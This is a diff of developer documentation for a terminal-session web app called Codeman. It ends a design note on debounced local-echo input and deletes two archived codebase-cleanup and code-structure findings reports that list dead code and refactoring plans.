// In deleteSession(), after removing the session from this.sessions:
|
||||
drainBgBuffer(); // Discard — session is gone, nowhere to send
|
||||
this.localEchoTextCache.delete(sessionId);
|
||||
```
|
||||
|
||||
## Visual Timeline
|
||||
|
||||
```
|
||||
t=0ms User types "h" → overlay: "h" bgBuffer: "h" timer: 50ms
|
||||
t=30ms User types "e" → overlay: "he" bgBuffer: "he" timer: reset 50ms
|
||||
t=60ms User types "l" → overlay: "hel" bgBuffer: "hel" timer: reset 50ms
|
||||
t=110ms Debounce fires → overlay: "hel" bgBuffer: "" POST "hel" → PTY
|
||||
t=115ms Ink echoes "hel" → terminal: "❯ hel" (hidden behind overlay)
|
||||
t=140ms User types "l" → overlay: "hell" bgBuffer: "l" timer: 50ms
|
||||
t=170ms User types "o" → overlay: "hello" bgBuffer: "lo" timer: reset 50ms
|
||||
t=220ms Debounce fires → overlay: "hello" bgBuffer: "" POST "lo" → PTY
|
||||
t=250ms User hits Enter → drainBgBuffer()="" overlay: cleared
|
||||
t=370ms \r sent via chain → Ink processes "hello\r" → output appears
|
||||
```
|
||||
|
||||
**Tab switch scenario:**
|
||||
```
|
||||
t=0ms User types "wor" → overlay: "wor" bgBuffer: "wor" timer: 50ms
|
||||
t=25ms User switches tab → drainBgBuffer() sends "wor" to old session PTY
|
||||
overlay text "wor" saved to localEchoTextCache
|
||||
overlay cleared, new session loaded
|
||||
...later...
|
||||
t=5000ms User switches back → terminal shows "❯ wor" (Ink echo from background send)
|
||||
overlay restores "wor" from cache, masks terminal
|
||||
user continues typing seamlessly
|
||||
```
|
||||
|
||||
## Edge Cases & Mitigations
|
||||
|
||||
### Confirmed Safe (JS single-threaded guarantee)
|
||||
|
||||
| Scenario | Why it's safe |
|
||||
|----------|--------------|
|
||||
| **Debounce fires during Enter handler** | Impossible. JS event loop is single-threaded — the Enter handler runs atomically. `drainBgBuffer()` cancels the timer before it can fire. |
|
||||
| **Debounce fires during tab switch** | Same reason. `selectSession()` calls `drainBgBuffer()` synchronously, canceling the timer. |
|
||||
| **Double-send of background buffer** | `drainBgBuffer()` atomically clears both buffer and timer. Once drained, subsequent drain returns empty string. |
|
||||
| **`_pendingInput` conflict** | In local echo mode, `_pendingInput` is only used for Enter (`\r`) and control chars. Background chars use a separate `_localEchoBgBuffer`. No overlap. |
|
||||
|
||||
### Handled by Design
|
||||
|
||||
| Scenario | Handling |
|
||||
|----------|---------|
|
||||
| **Rapid typing / paste** | 50ms debounce batches rapid chars. At 100 WPM (~50ms/char), sends ~1 char per batch. For paste (multi-char string, `data.length > 1`), the control char path bypasses the buffer entirely and sends immediately. |
|
||||
| **Network failure** | `_sendInputAsync` catches fetch failures and calls `_enqueueInput()` for retry. `_drainInputQueues()` replays on reconnect. Background chars use the same retry path. |
|
||||
| **Offline mode** | `_sendInputAsync` checks `this.isOnline` and immediately enqueues if offline. Same behavior for background sends. 64KB queue cap prevents memory growth. |
|
||||
| **Tab completion** | Ctrl+Tab path flushes background buffer BEFORE sending Tab char. PTY has full text for readline completion. |
|
||||
| **Session respawn** | PTY already has typed text (sent in background). On respawn, Claude exits and restarts — Ink's readline buffer is lost, but the text was already processed or is no longer relevant. The overlay clears on session status change via `_updateLocalEchoState()`. |
|
||||
| **SSE reconnect** | `handleInit()` saves overlay text before `selectSession()` clears it, then restores after reload (line ~3945–3966). Background buffer is cleared on reconnect since state is reset. |
|
||||
|
||||
### Network Ordering
|
||||
|
||||
**Question**: Can background sends arrive at the server out of order?
|
||||
|
||||
**Answer**: No, for practical purposes.
|
||||
|
||||
1. `_sendInputAsync` uses a **promise chain** (`_inputSendChain`) — each fetch is dispatched only after the previous one has been dispatched. This means requests are sent in order.
|
||||
2. Localhost connections (HTTP/1.1) are inherently sequential on a single TCP connection.
|
||||
3. Even with HTTP/2 multiplexing, Fastify (Node.js) is single-threaded — request handlers execute via the event loop in arrival order.
|
||||
4. The server's `session.write()` is synchronous — it writes to the PTY immediately within the request handler.
|
||||
|
||||
### Known Limitations (Not Addressed)
|
||||
|
||||
| Limitation | Impact | Notes |
|
||||
|-----------|--------|-------|
|
||||
| **IME composition** | CJK input via IME would send partial composition sequences to PTY | No IME handling exists in the codebase today (line count: 0 references to `compositionstart/end/update`). Fixing this is a separate feature. |
|
||||
| **`sendInput()` ordering** | Mobile accessory bar commands (`/init`, `/clear`, paste) use `sendInput()` which bypasses `_inputSendChain` — no ordering guarantee relative to background sends | Unlikely to conflict in practice: accessory bar clears the overlay first, and the commands are typically sent when no typing is in progress. |
|
||||
| **localStorage stale text** | After background sends, localStorage still has overlay text. On hard reload, overlay restores text that the PTY already has → visual duplicate behind overlay | Harmless — overlay masks the terminal. On Enter, overlay clears and terminal shows correct state. Could be fixed by clearing localStorage after successful background flush, but adds complexity for minimal benefit. |
|
||||
|
||||
## Verification Checklist
|
||||
|
||||
1. **Basic typing**: Enable local echo → type "hello" → overlay shows instantly → check Network tab for batched POST requests (~50ms intervals) → press Enter → command executes
|
||||
2. **Tab switch persistence**: Type "test" → switch to another tab → switch back → text visible in both overlay AND terminal prompt
|
||||
3. **Backspace**: Type "helloo" → press backspace → overlay shows "hello" → check PTY received \x7f
|
||||
4. **Paste**: Type "hel" → paste "lo world" → overlay clears → "lo world" sent immediately → PTY has "hello world"
|
||||
5. **Tab completion**: Type "src/w" → press Tab → PTY completes to "src/web/" (background send gave PTY the prefix)
|
||||
6. **Ctrl+C**: Type "hello" → press Ctrl+C → overlay clears → PTY receives pending chars + \x03
|
||||
7. **Network tab**: Verify POST /api/sessions/:id/input requests appear as you type (batched ~50ms)
|
||||
8. **Offline resilience**: Disconnect network → type "hello" → reconnect → verify chars are replayed via drain queue
|
||||
9. **Session delete**: Type text → delete session → no console errors from orphaned timer
|
||||
10. **Mobile keyboard**: Test on mobile device — typing goes through same onData path, same behavior expected
|
||||
|
||||
## Files Modified
|
||||
|
||||
| File | Changes |
|
||||
|------|---------|
|
||||
| `src/web/public/app.js` | ~40 lines changed across 5 locations (Steps 1–5) |
|
||||
|
||||
No server-side changes. No new files. No new dependencies.
|
||||
@@ -1,111 +0,0 @@
|
||||
> **⚠️ ARCHIVED 2026-05-21 — superseded, kept for history.**
|
||||
> The headline items here were verified resolved: the P0 `{WORKING_DIR}` placeholder
|
||||
> is now replaced (`plan-orchestrator.ts:431`), and the "~66 dead functions in app.js"
|
||||
> are gone (app.js was modularized 15K→3K LOC). A fresh `npm run knip` sweep on
|
||||
> 2026-05-21 found only a handful of unused test helpers. Do not treat this as a live TODO.
|
||||
|
||||
# Codebase Cleanup Findings
|
||||
|
||||
Compiled from parallel analysis of the entire Codeman codebase by 3 research agents (2026-02-19).
|
||||
|
||||
## P0 — Bug Fix
|
||||
|
||||
### 1. `{WORKING_DIR}` placeholder never replaced in plan-orchestrator.ts
|
||||
- **File:** `src/plan-orchestrator.ts:409`
|
||||
- `RESEARCH_AGENT_PROMPT` has `{WORKING_DIR}` placeholder but only `{TASK}` is replaced
|
||||
- The literal string `{WORKING_DIR}` gets sent to the AI model
|
||||
- **Fix:** Add `.replace('{WORKING_DIR}', this.workingDir)` after the `{TASK}` replacement
|
||||
|
||||
## P1 — Dead Code Removal (High Impact)
|
||||
|
||||
### 2. ~66 dead functions in app.js
|
||||
- Functions never called: `clearAll()`, `toggleSubagentDropdown()`, `goHome()`, `showRalphWizard()`, `minimizeRalphWizard()`, `restoreRalphWizard()`, `ralphWizardNext()`, `ralphWizardBack()`, `skipPlanGeneration()`, `regeneratePlan()`, `incrementTabCount()`, `decrementTabCount()`, `incrementShellCount()`, `decrementShellCount()`, `stopClaude()`, and ~50 more
|
||||
- Many are remnants of abandoned features (Ralph wizard, plan version history)
|
||||
- **Estimated savings:** 300-500 lines
|
||||
|
||||
### 3. ~74 dead CSS selectors in styles.css
|
||||
- Major dead blocks: Task Panel System (`.task-panel`), Process Panel System (`.process-panel`), Monitor Tabs (`.monitor-tabs`), Ralph Metadata (`.ralph-progress-section`, `.ralph-meta`), Plan Editor Toolbar, Plan Version History
|
||||
- Plus ~30 minor unused utility/component selectors
|
||||
- **Estimated savings:** ~400 lines
|
||||
|
||||
### 4. 13 dead type definitions in types.ts (~150 lines)
|
||||
- Dead request interfaces (superseded by Zod schemas): `CreateSessionRequest`, `RunPromptRequest`, `SessionInputRequest`, `ResizeRequest`, `CreateCaseRequest`, `QuickStartRequest`, `CreateScheduledRunRequest`, `QuickRunRequest`, `HookEventRequest`
|
||||
- Other dead types: `TaskAssignment`, `MemoryMetrics`, `RalphStateRecord`
|
||||
- Dead function: `createSuccessResponse` (exported, never imported)
|
||||
- **Estimated savings:** ~150 lines
|
||||
|
||||
### 5. 9 unused constants in map-limits.ts
|
||||
- `MAX_PENDING_HOOKS`, `MAX_SESSION_HISTORY`, `MAX_SSE_CLIENTS_PER_SESSION`, `MAX_TOTAL_SSE_CLIENTS`, `FILE_WATCHER_WARNING_THRESHOLD`, `MAX_QUEUED_TASKS`, `MAX_COMPLETED_TASKS_HISTORY`, `COMPLETED_TODO_TTL_MS`, `MAX_CONCURRENT_SESSIONS`
|
||||
- 9 of 14 exports are dead — only 5 are actually imported
|
||||
|
||||
### 6. Dead `SessionInputSchema` in schemas.ts
|
||||
- `SessionInputSchema` (line 87) is defined/exported but never imported
|
||||
- `SessionInputWithLimitSchema` is the one actually used
|
||||
|
||||
### 7. Dead `code-reviewer.ts` prompt file
|
||||
- `src/prompts/code-reviewer.ts` — entire file is dead, `CODE_REVIEWER_PROMPT` never imported
|
||||
- Re-exported in `src/prompts/index.ts` but no consumer
|
||||
|
||||
### 8. Dead utility exports
|
||||
- **Default exports** (4 files): `lru-map.ts`, `cleanup-manager.ts`, `stale-expiration-map.ts`, `buffer-accumulator.ts` — all have `export default` that's never used
|
||||
- **`stripAnsiSimple`** in `regex-patterns.ts` — exported, never imported (only `stripAnsi` used)
|
||||
- **String similarity**: `isSimilar`, `isSimilarByDistance`, `stringSimilarity`, `levenshteinDistance` — none imported externally
|
||||
- **LRUMap methods**: `oldest()`, `newest()`, `peek()`, `expireOlderThan()`, `valuesInOrder()`, `maxEntries`, `freeSlots` — never called
|
||||
- **StaleExpirationMap methods**: `touch()`, `getAge()`, `getRemainingTtl()`, `peek()` — never called
|
||||
- **CleanupManager methods**: `registerWatcher()`, `registerListener()`, `registerStream()`, `getRegistrations()`, `resourceCounts` — never called
|
||||
|
||||
### 9. Dead backend functions
|
||||
- `resetSessionManager()` in session-manager.ts:300 — never imported
|
||||
- `getStoredTasks()` in task-queue.ts:264 — never called
|
||||
- `start()` in session.ts:1918 — no-op legacy method
|
||||
- Empty `updateStatsFromEvent()` in run-summary.ts:397 — called every event, does nothing
|
||||
|
||||
### 10. Dead TS type exports
|
||||
- `AiCheckerEvents<R>`, `AiIdleCheckerEvents`, `AiPlanCheckerEvents` — never imported
|
||||
- `AiCheckStatus`, `AiPlanCheckStatus` — backwards compat aliases, never imported
|
||||
|
||||
## P2 — Performance & Efficiency
|
||||
|
||||
### 11. task-queue.ts `getCount()` iterates all tasks 5 times
|
||||
- Called every Ralph Loop tick — creates array from Map, then filters 4 times
|
||||
- **Fix:** Single-pass counting like `TaskTracker.getStats()` does
|
||||
|
||||
### 12. transcript-watcher.ts double file read
|
||||
- `readNewEntries()` reads the file twice: once for CRLF detection, once for parsing
|
||||
- `crlfDelay: Infinity` already handles both line endings
|
||||
- **Fix:** Remove the raw buffer CRLF check, read once
|
||||
|
||||
### 13. tmux-manager.ts `saveSessions()` no debounce
|
||||
- Rapid calls can overlap; no in-flight guard unlike `StateStore`
|
||||
- **Fix:** Add debouncing or in-flight tracking
|
||||
|
||||
## P3 — Consolidation & Consistency
|
||||
|
||||
### 14. Duplicate `SAFE_PATH_PATTERN` regex
|
||||
- `schemas.ts:15` and `tmux-manager.ts:81` — identical regex
|
||||
- **Fix:** Share from one location
|
||||
|
||||
### 15. Duplicate `MAX_CONCURRENT_SESSIONS`
|
||||
- `map-limits.ts:57` (dead) vs `server.ts:131` (used, hardcoded)
|
||||
- **Fix:** server.ts should import from map-limits
|
||||
|
||||
### 16. Duplicate cache TTLs in server.ts
|
||||
- `SESSIONS_LIST_CACHE_TTL` and `LIGHT_STATE_CACHE_TTL_MS` — both 1000ms
|
||||
- **Fix:** Consolidate into one constant
|
||||
|
||||
### 17. Inconsistent path import in server.ts
|
||||
- Imports both `path` default and destructured `{ join, dirname, resolve, relative, isAbsolute }`
|
||||
- 3 lines use `path.join()` while everywhere else uses `join()`
|
||||
- **Fix:** Remove default import, use `join()` consistently
|
||||
|
||||
### 18. Re-export indirection for `getAugmentedPath`
|
||||
- `session.ts:89` re-exports from `claude-cli-resolver.ts` for backwards compat
|
||||
- `ai-checker-base.ts` should import directly from source
|
||||
|
||||
### 19. `cliInfoUpdated` event missing from SessionEvents interface
|
||||
- Emitted in `session.ts:1742`, handled in `server.ts:4214`, but not in the interface
|
||||
- Type safety gap — handlers aren't type-checked
|
||||
|
||||
### 20. Array instead of Set for `_childAgentIds` in session.ts
|
||||
- Uses `includes()`/`indexOf()` for lookups (O(n))
|
||||
- Small lists in practice, but Set is more appropriate
|
||||
@@ -1,983 +0,0 @@
|
||||
> **⚠️ ARCHIVED 2026-05-21 — superseded, kept for history.**
|
||||
> The "Critical" structural items here are done: `server.ts` 6,736→2,065 LOC,
|
||||
> `app.js` 15,196→3,083 LOC, `types.ts` 1,443→12 LOC (now a barrel → `src/types/`).
|
||||
> The phase plans that executed this work are in `docs/archive/phase*-plan.md`.
|
||||
> Do not treat this as a live TODO; see CLAUDE.md for current architecture.
|
||||
|
||||
# Code Structure & Quality Findings
|
||||
|
||||
**Date**: 2026-02-28
|
||||
**Scope**: Full codebase analysis across 5 dimensions: frontend, backend, TypeScript, testing, and utilities/config.
|
||||
|
||||
This document contains detailed findings for agent teams to write implementation plans and execute improvements. Each section includes severity, specific locations, and recommended fixes.
|
||||
|
||||
---
|
||||
|
||||
## Table of Contents
|
||||
|
||||
1. [Critical: server.ts God Object (6,736 LOC)](#1-critical-serverts-god-object)
|
||||
2. [Critical: app.js Monolith (15,196 LOC)](#2-critical-appjs-monolith)
|
||||
3. [Critical: CleanupManager Unused Despite Existing](#3-critical-cleanupmanager-unused)
|
||||
4. [High: Duplicated Debounce/Timer Patterns](#4-high-duplicated-debouncetimer-patterns)
|
||||
5. [High: Large Domain Files Need Splitting](#5-high-large-domain-files-need-splitting)
|
||||
6. [High: types.ts God File (1,443 LOC)](#6-high-typests-god-file)
|
||||
7. [High: Zod Schemas Duplicate TypeScript Types](#7-high-zod-schemas-duplicate-typescript-types)
|
||||
8. [High: Test Coverage Gaps](#8-high-test-coverage-gaps)
|
||||
9. [High: Duplicated Test Mocks](#9-high-duplicated-test-mocks)
|
||||
10. [Medium: Hardcoded Magic Values](#10-medium-hardcoded-magic-values)
|
||||
11. [Medium: Frontend Global State Monolith](#11-medium-frontend-global-state-monolith)
|
||||
12. [Medium: Frontend Code Duplication](#12-medium-frontend-code-duplication)
|
||||
13. [Medium: Inconsistent Logging](#13-medium-inconsistent-logging)
|
||||
14. [Medium: Utils Barrel Export Gaps](#14-medium-utils-barrel-export-gaps)
|
||||
15. [Medium: Non-Null Assertion Risks](#15-medium-non-null-assertion-risks)
|
||||
16. [Low: Dead Utility Functions](#16-low-dead-utility-functions)
|
||||
17. [Low: No Dependency Injection for File I/O](#17-low-no-dependency-injection-for-file-io)
|
||||
18. [Scorecard & Prioritized Roadmap](#18-scorecard--prioritized-roadmap)
|
||||
|
||||
---
|
||||
|
||||
## 1. Critical: server.ts God Object
|
||||
|
||||
**File**: `src/web/server.ts` (6,736 lines)
|
||||
**Severity**: CRITICAL
|
||||
**Impact**: Hardest file to maintain, test, and extend. Imports 38 modules.
|
||||
|
||||
### Problem
|
||||
|
||||
The `WebServer` class handles everything: HTTP routing (~110 routes), authentication, SSE broadcasting, terminal data batching, state persistence, session lifecycle, respawn orchestration, file serving, tunnel management, plan orchestration, and subagent coordination.
|
||||
|
||||
**Key metrics**:
|
||||
- 40+ private properties (Maps, timers, caches)
|
||||
- 70+ methods
|
||||
- `setupRoutes()` is 2,000+ LOC of inline route handlers
|
||||
- Zero test coverage
|
||||
|
||||
### Current Structure (Bad)
|
||||
|
||||
```
|
||||
WebServer class (6,736 LOC)
|
||||
├── Auth session management (lines 469, 668-698)
|
||||
├── SSE client management (lines 407-408, 5843-5880)
|
||||
├── Terminal data batching (lines 414-416, 5909-5966)
|
||||
├── Task update batching (line 426, 5995-6028)
|
||||
├── State persistence batching (lines 429-430, 6028-6061)
|
||||
├── Respawn lifecycle (lines 445-451, 5425-5534)
|
||||
├── Session cleanup (lines 4769-4961)
|
||||
├── Listener setup (lines 544-643)
|
||||
└── setupRoutes() (lines 645+, 2000+ LOC)
|
||||
├── /api/sessions/* (30+ routes inline)
|
||||
├── /api/respawn/* (7 routes inline)
|
||||
├── /api/subagents/* (7 routes inline)
|
||||
├── /api/plan/* (5 routes inline)
|
||||
├── /api/push/* (4 routes inline)
|
||||
└── ... 60+ more inline
|
||||
```
|
||||
|
||||
### Recommended Structure
|
||||
|
||||
```
|
||||
src/web/
|
||||
├── server.ts (~500 LOC - HTTP setup, route registration only)
|
||||
├── routes/
|
||||
│ ├── session-routes.ts (session CRUD, input, resize)
|
||||
│ ├── respawn-routes.ts (respawn control endpoints)
|
||||
│ ├── subagent-routes.ts (background agent tracking)
|
||||
│ ├── plan-routes.ts (plan generation & management)
|
||||
│ ├── push-routes.ts (web push subscriptions)
|
||||
│ ├── mux-routes.ts (tmux management)
|
||||
│ ├── case-routes.ts (case management)
|
||||
│ ├── file-routes.ts (file browsing/serving)
|
||||
│ └── system-routes.ts (status, stats, config, settings)
|
||||
├── middleware/
|
||||
│ ├── auth.ts (Basic Auth + session cookies)
|
||||
│ └── error-handler.ts (centralized error responses)
|
||||
└── services/
|
||||
├── sse-manager.ts (SSE client + broadcast)
|
||||
├── terminal-batcher.ts (60fps terminal batching)
|
||||
└── session-lifecycle.ts (listener setup/teardown)
|
||||
```
|
||||
|
||||
### Duplication in server.ts
|
||||
|
||||
**Error response pattern** repeated 189 times:
|
||||
```typescript
|
||||
return createErrorResponse(ApiErrorCode.NOT_FOUND, 'Session not found');
|
||||
```
|
||||
|
||||
**Fix**: Extract `findSessionOrFail()` middleware:
|
||||
```typescript
|
||||
const findSessionOrFail = (sessionId: string) => {
|
||||
const session = this.sessions.get(sessionId);
|
||||
if (!session) throw new NotFoundError('Session not found');
|
||||
return session;
|
||||
};
|
||||
```
|
||||
|
||||
**Event listener setup** copy-pasted for subagent watcher, image watcher, and team watcher (lines 544-643). Same attach/detach pattern duplicated 3 times.
|
||||
|
||||
---
|
||||
|
||||
## 2. Critical: app.js Monolith
|
||||
|
||||
**File**: `src/web/public/app.js` (15,196 lines)
|
||||
**Severity**: CRITICAL
|
||||
**Impact**: Untestable, hard to navigate, tightly coupled systems.
|
||||
|
||||
### Extractable Modules (by priority)
|
||||
|
||||
| Module | Lines | Current Location | Impact |
|
||||
|--------|-------|------------------|--------|
|
||||
| Mobile handlers (MobileDetection, KeyboardHandler, SwipeHandler) | ~300 | lines 168-620 | High |
|
||||
| Voice input (DeepgramProvider, VoiceInput) | ~830 | lines 631-1471 | High |
|
||||
| NotificationManager | ~450 | lines 2218-2663 | High |
|
||||
| xterm-zerolag-input (inlined copy from packages/) | ~400 | lines 1756-2153 | High |
|
||||
| KeyboardAccessoryBar | ~195 | lines 1480-1680 | Medium |
|
||||
| FocusTrap | ~60 | lines 1690-1748 | Medium |
|
||||
|
||||
### CodemanApp Class (12,000+ LOC)
|
||||
|
||||
The main `CodemanApp` class starting at line 2665 has:
|
||||
- **60+ Maps/Sets** in the constructor (lines 2667-2805)
|
||||
- **18 Map instances** with complex cross-references (subagents, parents, teams, windows)
|
||||
- **10+ monolithic methods** exceeding 100 lines each
|
||||
|
||||
**Largest methods**:
|
||||
| Method | Lines | Size |
|
||||
|--------|-------|------|
|
||||
| `renderAppSettings()` | 14400-14700 | ~300 LOC |
|
||||
| `selectSession()` | 6028-6250 | ~220 LOC |
|
||||
| `batchTerminalWrite()` | 7482-7700 | ~200 LOC |
|
||||
| `renderSessionTabs()` | 5814-6000 | ~180 LOC |
|
||||
| `openSubagentWindow()` | 11927-12100 | ~170 LOC |
|
||||
| `handleInit()` | 5183-5350 | ~170 LOC |
|
||||
|
||||
### Recommended Split
|
||||
|
||||
```
|
||||
src/web/public/
|
||||
├── app.js (~4000 LOC - core app, session mgmt, SSE)
|
||||
├── mobile.js (~300 LOC - MobileDetection, KeyboardHandler, SwipeHandler)
|
||||
├── voice.js (~830 LOC - DeepgramProvider, VoiceInput)
|
||||
├── notifications.js (~450 LOC - NotificationManager)
|
||||
├── keyboard-accessory.js (~200 LOC - KeyboardAccessoryBar)
|
||||
├── api-client.js (~100 LOC - fetch wrapper with error handling)
|
||||
└── config.js (~50 LOC - magic numbers, z-index layers)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Critical: CleanupManager Unused
|
||||
|
||||
**File**: `src/utils/cleanup-manager.ts` (320 lines)
|
||||
**Severity**: CRITICAL
|
||||
**Impact**: Memory leak risk. Well-designed utility exists but is never used. Every file manages cleanup manually.
|
||||
|
||||
### Current State
|
||||
|
||||
`CleanupManager` is exported from the utils barrel but has **0 instantiations** in production code. Instead, every file implements manual cleanup:
|
||||
|
||||
**respawn-controller.ts** (worst offender):
|
||||
```typescript
|
||||
// 11 timer properties, manually cleared in stop()
|
||||
private stepTimer: NodeJS.Timeout | null = null;
|
||||
private completionConfirmTimer: NodeJS.Timeout | null = null;
|
||||
private noOutputTimer: NodeJS.Timeout | null = null;
|
||||
// ... 8 more
|
||||
|
||||
stop() {
|
||||
if (this.stepTimer) clearTimeout(this.stepTimer);
|
||||
if (this.completionConfirmTimer) clearTimeout(this.completionConfirmTimer);
|
||||
// ... 9 more clearTimeout/clearInterval calls
|
||||
}
|
||||
```
|
||||
|
||||
**Files that should use CleanupManager**:
|
||||
| File | Timer/Listener Count | Current Cleanup |
|
||||
|------|---------------------|-----------------|
|
||||
| `respawn-controller.ts` | 11 timers + intervals | 11 manual clearTimeout/clearInterval |
|
||||
| `web/server.ts` | 6+ timers, debounce map | Manual in stop(), some may leak |
|
||||
| `state-store.ts` | 2 debounce timers | Manual clearTimeout |
|
||||
| `push-store.ts` | 1 save timer | Manual clearTimeout |
|
||||
| `subagent-watcher.ts` | debounce map + watchers | Manual clear + close |
|
||||
| `ralph-tracker.ts` | 3 debounce timers | Manual clear |
|
||||
| `bash-tool-parser.ts` | 1 debounce timer | Manual clear |
|
||||
| `image-watcher.ts` | 1 debounce map | Manual clear |
|
||||
|
||||
### Fix
|
||||
|
||||
Migrate all timer management to use `CleanupManager`. Example for respawn-controller.ts:
|
||||
|
||||
```typescript
|
||||
// Before: 11 fields + 11 clearTimeout calls
|
||||
private stepTimer: NodeJS.Timeout | null = null;
|
||||
// ...
|
||||
|
||||
// After: 1 field, auto-cleanup
|
||||
private cleanup = new CleanupManager();
|
||||
|
||||
startStep() {
|
||||
this.cleanup.setTimeout(() => { ... }, 5000, 'step');
|
||||
}
|
||||
|
||||
stop() {
|
||||
this.cleanup.dispose(); // Clears everything
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. High: Duplicated Debounce/Timer Patterns
|
||||
|
||||
**Severity**: HIGH
|
||||
**Impact**: 8+ files implement debounce independently. Bug fixes need to be applied everywhere.
|
||||
|
||||
### Pattern Inventory
|
||||
|
||||
```typescript
|
||||
// Pattern 1: Manual timer ref (used in 6 files)
|
||||
private saveTimer: NodeJS.Timeout | null = null;
|
||||
debouncedSave() {
|
||||
if (this.saveTimer) clearTimeout(this.saveTimer);
|
||||
this.saveTimer = setTimeout(() => this.save(), 500);
|
||||
}
|
||||
|
||||
// Pattern 2: Timer Map (used in 3 files)
|
||||
private fileDebouncers = new Map<string, NodeJS.Timeout>();
|
||||
debounce(key: string) {
|
||||
const existing = this.fileDebouncers.get(key);
|
||||
if (existing) clearTimeout(existing);
|
||||
this.fileDebouncers.set(key, setTimeout(() => { ... }, 100));
|
||||
}
|
||||
|
||||
// Pattern 3: State flag (used in 2 files)
|
||||
private isSaving = false;
|
||||
```
|
||||
|
||||
### Locations
|
||||
|
||||
| File | Debounce Vars | Delay (ms) |
|
||||
|------|---------------|------------|
|
||||
| `state-store.ts` | `saveTimeout`, `ralphStateSaveTimeout` | 500 |
|
||||
| `push-store.ts` | `saveTimer` | 500 |
|
||||
| `web/server.ts` | `persistDebounceTimers` (Map) | 500 |
|
||||
| `subagent-watcher.ts` | `fileDebouncers` (Map) | 100 |
|
||||
| `ralph-tracker.ts` | 3 debounce timers | 50, 30000 |
|
||||
| `bash-tool-parser.ts` | `EVENT_DEBOUNCE_MS` | 50 |
|
||||
| `image-watcher.ts` | debounce map | 200 |
|
||||
| `respawn-controller.ts` | 11 timer fields | various |
|
||||
|
||||
### Fix
|
||||
|
||||
Create a `Debouncer` utility:
|
||||
|
||||
```typescript
|
||||
// src/utils/debouncer.ts
|
||||
export class Debouncer {
|
||||
private timer: NodeJS.Timeout | null = null;
|
||||
|
||||
constructor(private readonly delayMs: number) {}
|
||||
|
||||
run(fn: () => void): void {
|
||||
if (this.timer) clearTimeout(this.timer);
|
||||
this.timer = setTimeout(fn, this.delayMs);
|
||||
}
|
||||
|
||||
cancel(): void {
|
||||
if (this.timer) clearTimeout(this.timer);
|
||||
this.timer = null;
|
||||
}
|
||||
}
|
||||
|
||||
// Usage:
|
||||
private saveDeb = new Debouncer(500);
|
||||
this.saveDeb.run(() => this.save());
|
||||
// cleanup: this.saveDeb.cancel();
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. High: Large Domain Files Need Splitting
|
||||
|
||||
**Severity**: HIGH
|
||||
**Impact**: Complex state machines spanning 3,000+ lines are hard to understand and test.
|
||||
|
||||
### ralph-tracker.ts (3,905 LOC)
|
||||
|
||||
**5 responsibilities mixed**:
|
||||
1. Output Parsing (~900 LOC) - Line-by-line parsing, state extraction
|
||||
2. Todo Management (~700 LOC) - Parsing, dedup, expiry
|
||||
3. Plan Tracking (~800 LOC) - Enhanced plan tasks, checkpoints
|
||||
4. Circuit Breaker (~400 LOC) - State machine for stuck detection
|
||||
5. File Watching (~300 LOC) - Monitor external state files
|
||||
|
||||
**Recommended split**:
|
||||
```
|
||||
ralph-tracker.ts (core output parsing, ~1200 LOC)
|
||||
ralph-todo-manager.ts (todo parsing + management, ~700 LOC)
|
||||
ralph-plan-tracker.ts (plan tasks + checkpoints, ~800 LOC)
|
||||
ralph-circuit-breaker.ts (circuit breaker logic, ~400 LOC)
|
||||
```
|
||||
|
||||
### respawn-controller.ts (3,611 LOC)
|
||||
|
||||
**6 responsibilities mixed**:
|
||||
1. State Machine (~1,000 LOC) - 6+ states, transitions
|
||||
2. Idle Detection (~800 LOC) - 5 layers + multi-signal combining
|
||||
3. AI Checkers (~600 LOC) - Idle + plan checkers integration
|
||||
4. Health Scoring (~500 LOC) - Metrics, circuit breaker, scoring
|
||||
5. Action Logging (~300 LOC) - Timeline, detection status
|
||||
6. Stuck-State Detection (~250 LOC) - Timeout tracking
|
||||
|
||||
**Recommended split**:
|
||||
```
|
||||
respawn-controller.ts (state machine core, ~1000 LOC)
|
||||
respawn-idle-detection.ts (all 5 idle detection layers, ~800 LOC)
|
||||
respawn-health-scorer.ts (metrics & health scoring, ~500 LOC)
|
||||
```
|
||||
|
||||
### session.ts (2,418 LOC)
|
||||
|
||||
**8 responsibilities mixed**:
|
||||
1. PTY Management (~600 LOC)
|
||||
2. Terminal I/O (~400 LOC)
|
||||
3. Token Tracking (~200 LOC)
|
||||
4. Task Tracking (~250 LOC)
|
||||
5. Ralph Integration (~200 LOC)
|
||||
6. Auto-Clear/Compact (~300 LOC)
|
||||
7. Image Watching (~100 LOC)
|
||||
8. CLI Detection (~150 LOC)
|
||||
|
||||
**Recommended split**:
|
||||
```
|
||||
session.ts (PTY + terminal I/O core, ~1000 LOC)
|
||||
session-tracking.ts (token + task + Ralph, ~500 LOC)
|
||||
session-auto-ops.ts (auto-clear/compact + image, ~300 LOC)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. High: types.ts God File
|
||||
|
||||
**File**: `src/types.ts` (1,443 lines, 72 exported definitions)
|
||||
**Severity**: HIGH
|
||||
**Impact**: Every file imports from types.ts. Hard to find relevant types.
|
||||
|
||||
### Current Contents
|
||||
|
||||
- 46 interfaces
|
||||
- 25 types
|
||||
- 1 enum (ApiErrorCode)
|
||||
- 9 factory functions (createInitialState, etc.)
|
||||
|
||||
### Recommended Split
|
||||
|
||||
```
|
||||
src/types/
|
||||
├── index.ts (barrel export - transparent migration)
|
||||
├── session.ts (SessionState, SessionConfig, SessionMode, SessionColor)
|
||||
├── task.ts (TaskState, TaskDefinition, TaskStatus)
|
||||
├── respawn.ts (RespawnConfig, RespawnState, CircuitBreakerStatus)
|
||||
├── ralph.ts (RalphLoopState, RalphTrackerState, RalphTodoItem)
|
||||
├── api.ts (ApiResponse, ApiErrorCode, HookEventType, all route types)
|
||||
├── lifecycle.ts (LifecycleEventType, LifecycleEntry)
|
||||
└── common.ts (Disposable, BufferConfig, CleanupResourceType)
|
||||
```
|
||||
|
||||
The barrel export makes this a transparent refactor - existing `import from './types'` continues to work.
|
||||
|
||||
---
|
||||
|
||||
## 7. High: Zod Schemas Duplicate TypeScript Types
|
||||
|
||||
**File**: `src/web/schemas.ts` (508 lines)
|
||||
**Severity**: HIGH
|
||||
**Impact**: When a type changes, the Zod schema must be manually updated too. Source of bugs.
|
||||
|
||||
### Problem
|
||||
|
||||
Zod schemas manually duplicate TypeScript interfaces. **Zero `z.infer` usage found.**
|
||||
|
